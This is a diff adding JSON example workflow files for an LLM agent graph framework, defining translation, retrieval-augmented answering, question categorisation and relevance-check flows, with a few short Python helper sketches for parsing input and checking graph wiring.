@@ -0,0 +1,39 @@
|
||||
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "Hi there! Please enter the text you want to translate in the format 'text you want to translate' => target language. For example: 您好! => English"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["generate:0"],
      "upstream": ["begin", "generate:0"]
    },
    "generate:0": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language.\n- Answer format: => translated content in target language.\n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね。\n",
          "temperature": 0.5
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["answer:0"]
    }
  },
  "history": [],
  "messages": [],
  "reference": {},
  "path": [],
  "answer": []
}
39  graph/test/dsl_examples/interpreter.json  Normal file
@@ -0,0 +1,39 @@
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "Hi there! Please enter the text you want to translate in the format 'text you want to translate' => target language. For example: 您好! => English"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["generate:0"],
      "upstream": ["begin", "generate:0"]
    },
    "generate:0": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language.\n- Answer format: => translated content in target language.\n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね。\n",
          "temperature": 0.5
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["answer:0"]
    }
  },
  "history": [],
  "messages": [],
  "reference": {},
  "path": [],
  "answer": []
}
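
The translator prompt relies on the caller honoring the "text => target language" input format. A self-contained pre-check one could put in front of the flow; this helper is hypothetical and not part of the repo:

    import re

    # Hypothetical input guard for the interpreter flow's expected format,
    # "text to translate => target language" (e.g. "您好! => English").
    PATTERN = re.compile(r"^(?P<text>.+?)\s*=>\s*(?P<lang>\S.*)$", re.S)

    def parse_translation_request(user_input: str):
        """Return (text, target_language), or None if the input is malformed."""
        m = PATTERN.match(user_input.strip())
        if not m:
            return None
        return m.group("text").strip(), m.group("lang").strip()

    assert parse_translation_request("您好! => English") == ("您好!", "English")
    assert parse_translation_request("no arrow here") is None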
54  graph/test/dsl_examples/retrieval_and_generate.json  Normal file
@@ -0,0 +1,54 @@
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "Hi there!"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["retrieval:0"],
      "upstream": ["begin", "generate:0"]
    },
    "retrieval:0": {
      "obj": {
        "component_name": "Retrieval",
        "params": {
          "similarity_threshold": 0.2,
          "keywords_similarity_weight": 0.3,
          "top_n": 6,
          "top_k": 1024,
          "rerank_id": "BAAI/bge-reranker-v2-m3",
          "kb_ids": ["869a236818b811ef91dffa163e197198"]
        }
      },
      "downstream": ["generate:0"],
      "upstream": ["answer:0"]
    },
    "generate:0": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
          "temperature": 0.2
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["retrieval:0"]
    }
  },
  "history": [],
  "messages": [],
  "reference": {},
  "path": [],
  "answer": []
}
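
In this flow the Retrieval component's output lands in the Generate prompt through the {input} placeholder. An illustration of the substitution; the joining convention here is an assumption, not ragflow's exact code:

    # Illustration only: how retrieved chunks could be spliced into the
    # Generate prompt's {input} slot. The newline join is an assumption.
    prompt_template = (
        "Here is the knowledge base:\n"
        " {input}\n"
        " The above is the knowledge base."
    )

    retrieved_chunks = [
        "Chunk 1: installation steps ...",
        "Chunk 2: troubleshooting guide ...",
    ]

    print(prompt_template.format(input="\n".join(retrieved_chunks)))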
@@ -0,0 +1,88 @@
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "Hi there!"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["categorize:0"],
      "upstream": ["begin", "generate:0", "message:0"]
    },
    "categorize:0": {
      "obj": {
        "component_name": "Categorize",
        "params": {
          "llm_id": "deepseek-chat",
          "category_description": {
            "product_related": {
              "description": "The question is about the product usage, appearance and how it works.",
              "examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
              "to": "retrieval:0"
            },
            "others": {
              "description": "The question is not about the product usage, appearance and how it works.",
              "examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
              "to": "message:0"
            }
          }
        }
      },
      "downstream": ["retrieval:0", "message:0"],
      "upstream": ["answer:0"]
    },
    "message:0": {
      "obj": {
        "component_name": "Message",
        "params": {
          "messages": [
            "Sorry, I don't know. I'm an AI bot."
          ]
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["categorize:0"]
    },
    "retrieval:0": {
      "obj": {
        "component_name": "Retrieval",
        "params": {
          "similarity_threshold": 0.2,
          "keywords_similarity_weight": 0.3,
          "top_n": 6,
          "top_k": 1024,
          "rerank_id": "BAAI/bge-reranker-v2-m3",
          "kb_ids": ["869a236818b811ef91dffa163e197198"]
        }
      },
      "downstream": ["generate:0"],
      "upstream": ["categorize:0"]
    },
    "generate:0": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
          "temperature": 0.2
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["retrieval:0"]
    }
  },
  "history": [],
  "messages": [],
  "reference": {},
  "path": [],
  "answer": []
}
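
Every example keeps the downstream and upstream lists in lockstep, which makes wiring mistakes, such as a component id referenced on one side only, easy to detect mechanically. A small checker sketch over the DSL structure shown above; the reciprocity rule is inferred from these examples rather than from documented semantics:

    import json

    def check_graph(dsl: dict) -> list:
        """List dangling ids and non-reciprocal downstream/upstream edges."""
        comps = dsl["components"]
        problems = []
        for cid, comp in comps.items():
            for direction, mirror in (("downstream", "upstream"), ("upstream", "downstream")):
                for target in comp.get(direction, []):
                    if target not in comps:
                        problems.append("%s.%s -> missing component %r" % (cid, direction, target))
                    elif cid not in comps[target].get(mirror, []):
                        problems.append("%s -> %s not mirrored in %s.%s" % (cid, target, target, mirror))
        return problems

    with open("graph/test/dsl_examples/retrieval_and_generate.json") as f:
        print(check_graph(json.load(f)) or "graph wiring is consistent")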
82  graph/test/dsl_examples/retrieval_relevant_and_generate.json  Normal file
@@ -0,0 +1,82 @@
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "Hi there!"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["retrieval:0"],
      "upstream": ["begin", "generate:0", "message:0"]
    },
    "retrieval:0": {
      "obj": {
        "component_name": "Retrieval",
        "params": {
          "similarity_threshold": 0.2,
          "keywords_similarity_weight": 0.3,
          "top_n": 6,
          "top_k": 1024,
          "rerank_id": "BAAI/bge-reranker-v2-m3",
          "kb_ids": ["869a236818b811ef91dffa163e197198"],
          "empty_response": "Sorry, the knowledge base has no related information."
        }
      },
      "downstream": ["relevant:0"],
      "upstream": ["answer:0"]
    },
    "relevant:0": {
      "obj": {
        "component_name": "Relevant",
        "params": {
          "llm_id": "deepseek-chat",
          "temperature": 0.02,
          "yes": "generate:0",
          "no": "message:0"
        }
      },
      "downstream": ["message:0", "generate:0"],
      "upstream": ["retrieval:0"]
    },
    "generate:0": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "You are an intelligent assistant. Please answer the question based on the content of the knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n The knowledge base content is as follows:\n {input}\n The above is the content of the knowledge base.",
          "temperature": 0.2
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["relevant:0"]
    },
    "message:0": {
      "obj": {
        "component_name": "Message",
        "params": {
          "messages": [
            "Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
            "I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
            "Can't find the answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
          ]
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["relevant:0"]
    }
  },
  "history": [],
  "path": [],
  "messages": [],
  "reference": {},
  "answer": []
}
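
The Relevant component is the only branch point here: its "yes"/"no" params name the component to jump to after an LLM relevance judgment. A stand-in for that routing decision; the judge call and its prompt are placeholders, not the component's actual implementation:

    # Sketch of the routing implied by relevant:0's params: an LLM judges
    # relevance and the flow continues at the id under "yes" or "no".
    def route_relevant(params, question, retrieved, judge):
        """Return the id of the next component to run."""
        verdict = judge(
            "Question: %s\nContent: %s\nIs the content relevant? Answer yes or no."
            % (question, retrieved)
        )
        return params["yes"] if verdict.strip().lower().startswith("yes") else params["no"]

    params = {"yes": "generate:0", "no": "message:0"}
    print(route_relevant(params, "How to install it?", "Installation guide ...", lambda _: "yes"))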
Some files were not shown because too many files have changed in this diff.